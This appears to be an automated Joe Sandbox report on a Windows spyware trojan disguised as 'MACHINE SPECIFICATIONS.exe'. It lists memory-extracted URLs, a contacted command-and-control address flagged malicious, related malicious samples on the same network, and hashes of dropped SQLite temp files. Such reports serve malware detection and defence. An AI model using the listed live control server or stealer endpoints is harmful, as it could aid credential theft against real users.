https://duckduckgo.com/ac/?q=	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
https://support.google.com/chrome/?p=plugin_wmp	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6258784	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/t_	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/D	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_java	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.micros	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_real	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://185.222.58.90:17910	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_pdf	MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/0	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://forms.real.com/real/realone/download.html?type=rpsp_us	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://support.a	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/ip%appdata%	MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_quicktime	MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://helpx.ad	MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://get.adob	MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
http://185.222.58.90:1	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://service.real.com/realplayer/security/02062012_player/en/	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://forms.rea	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.90	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	634065
Start date and time: 25/05/202215:06:07	2022-05-25 15:06:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MACHINE SPECIFICATIONS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 0.5% (good quality ratio 0.5%) Quality average: 77.6% Quality standard deviation: 18.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 96 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.26.13.31, 172.67.75.172, 104.26.12.31
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:07:53	API Interceptor	100x Sleep call for process: MACHINE SPECIFICATIONS.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.222.58.90	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	185.222.58.90:17910/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROOTLAYERNETNL	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	185.222.58.90
	New Order.exe	Get hash	malicious	Browse	185.222.57.178
	e_Receipt.pdf.exe	Get hash	malicious	Browse	45.137.22.163
	View Payment.exe	Get hash	malicious	Browse	45.137.22.35
	SecuriteInfo.com.Variant.Babar.54324.15185.exe	Get hash	malicious	Browse	185.222.57.79
	PAYMENT.exe	Get hash	malicious	Browse	185.222.58.237
	Payment.exe	Get hash	malicious	Browse	45.137.22.122
	Quotation.xlsx	Get hash	malicious	Browse	185.222.58.51
	Order Package.xlsx	Get hash	malicious	Browse	185.222.58.244
	ORDER SV-033764.exe	Get hash	malicious	Browse	185.222.57.155
	ORDER_SV-033764.exe	Get hash	malicious	Browse	185.222.57.155
	ORDER SV-033764.exe	Get hash	malicious	Browse	185.222.57.155
	ORDER SV-033764.exe	Get hash	malicious	Browse	185.222.57.155
	Hzb1l180P6.exe	Get hash	malicious	Browse	45.137.22.227
	bankreportt.exe	Get hash	malicious	Browse	185.222.57.252
	SecuriteInfo.com.W32.AIDetectNet.01.11996.exe	Get hash	malicious	Browse	185.222.57.252
	SecuriteInfo.com.W32.AIDetectNet.01.20266.exe	Get hash	malicious	Browse	185.222.57.252
	aaaaaaaa.docx	Get hash	malicious	Browse	185.222.58.48
	SecuriteInfo.com.Variant.Strictor.270970.28606.exe	Get hash	malicious	Browse	185.222.57.199
	INV_TMB-CI2006-003.xlsx	Get hash	malicious	Browse	185.222.58.48

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	5.347480285514745
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKharkvoDLI4MWuCv:MLU84qpE4Ks2wKDE4KhK3VZ9pKhIE4Ks
MD5:	4E2C52C54E01A6E1B1A9AE5F1DFEA744
SHA1:	7768B945A7B642D21C1946F817C4CE91AD81BBD7
SHA-256:	C694679BDC1CEACC4E7F1732892773372D6548C71625579BE6A8BE8F39EC95AE
SHA-512:	23E707DB6ECBE26936723C43039DA8F57364CA24AF0448B14D8705518F5D94AD3A24A54A5522A9A1FEC8EC9868F738A8A72295F00FCC8CF02E9F5421CC86A7CC
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\tmp133B.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3E83.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4163.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp447D.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp49BD.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
